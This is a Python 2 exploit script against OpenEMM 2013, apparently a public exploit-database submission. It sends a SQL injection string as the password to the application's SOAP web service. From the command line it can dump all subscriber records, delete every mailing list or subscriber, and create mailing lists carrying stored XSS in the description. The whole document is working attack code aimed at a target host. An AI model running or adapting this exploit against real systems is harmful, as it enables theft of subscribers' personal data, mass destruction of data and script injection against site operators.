openemm sploit

1. import os
2. import sys
3. from SOAPpy import WSDL
4. from argparse import ArgumentParser
5. from re import sub
6.  
7. # Exploit Title: OpenEMM 2013 SQL Injection / Stored XSS
8. # Date: 07/20/2013
9. # Exploit Author: drone (@dronesec)
10. # Vendor Homepage: http://www.openemm.org/
11. # Software Link: https://downloads.sourceforge.net/project/openemm/OpenEMM%20software/OpenEMM%202013/OpenEMM-2013-bin.tar.gz
12. # Version: 2013 (8.10.380.hf13.0.066)
13. # Tested on: Ubuntu 12.04
14.  
15. """ Exploits a host of vulnerabilities discovered in OpenEMM.
16.    Required ws.wsdl file should be in local directory.
17. """
18. def run(options):
19.     """ run exploit
20.    """
21.     wsdl_file = "./ws.wsdl"
22.     sploit = "\\' OR 1=1;-- "
23.  
24.     _server = WSDL.Proxy(wsdl_file)
25.  
26.     if options.subscribers:
27.         # iterate until we get a null response
28.         idx = 1
29.         while True:
30.             ret = _server.getSubscriber("wsadmin", sploit, idx)
31.             if ret.paramValues == '':
32.                 print '[!] Discovered %d subscribers'%(idx-1)
33.                 break
34.  
35.             print ret.paramValues
36.             idx += 1
37.  
38.     elif options.mlist:
39.         try:
40.             print '[!] Description field vulnerable to stored xss!'
41.             description = raw_input('[!] Enter mlist description: ')
42.         except:
43.             description = ''
44.  
45.         ret = _server.addMailinglist('wsadmin', sploit, options.mlist, description)
46.         if ret > 0: print '[!] Saved successfully'
47.         else:       print '[!] Save unsuccessful'
48.  
49.     elif options.dmlist:
50.         print '[!] Deleting all mailing lists...'
51.         idx = 1
52.         while True:
53.             ret = _server.deleteMailinglist('wsadmin', sploit, idx)
54.             if ret == 0:
55.                 print '[!] Deleted %d mailing lists.'%idx
56.                 break
57.             idx += 1
58.  
59.     elif options.dsubs:
60.         print '[!] Deleting all subscribers...'
61.         idx = 1
62.         while True:
63.             ret = _server.deleteSubscriber('wsadmin', sploit, idx)
64.             if ret == 0:
65.                 print '[!] Deleted %d subscribers.'%idx
66.                 break
67.             idx += 1
68.  
69. def parse_args():
70.     """ parse args and sub in the desired IP
71.    """
72.     parser = ArgumentParser()
73.     parser.add_argument('-i', help='server address', action='store',
74.                 dest='host', required=True)
75.     parser.add_argument('-s', help='fetch all subscribers', action='store_true',
76.                 dest='subscribers')
77.     parser.add_argument('-m', help='create new mailing list (XSS)', action='store',
78.                 dest='mlist')
79.     parser.add_argument('--dm', help='delete all mailing lists', action='store_true',
80.                 dest='dmlist')
81.     parser.add_argument('--ds', help='delete all subscribers', action='store_true',
82.                 dest='dsubs')
83.  
84.     options = parser.parse_args()
85.     try:
86.         # sub in server address
87.         with open('ws.wsdl', 'r') as f:
88.             out = open('tmp.wsdl', 'w+')
89.             for line in f:
90.                 line = sub('location="(.*?)"',
91.                     'location="http://{0}:8080/emm_webservice"'.format(options.host),
92.                     line)
93.                 out.write(line)
94.             out.close()
95.     except IOError:
96.         print '[-] ws.wsdl not found'
97.         sys.exit(1)
98.  
99.     # replace ws.wsdl with temp one
100.     os.system('mv tmp.wsdl ws.wsdl')
101.     return options
102.  
103. if __name__ == "__main__":
104.     options = parse_args()
105.     run(options)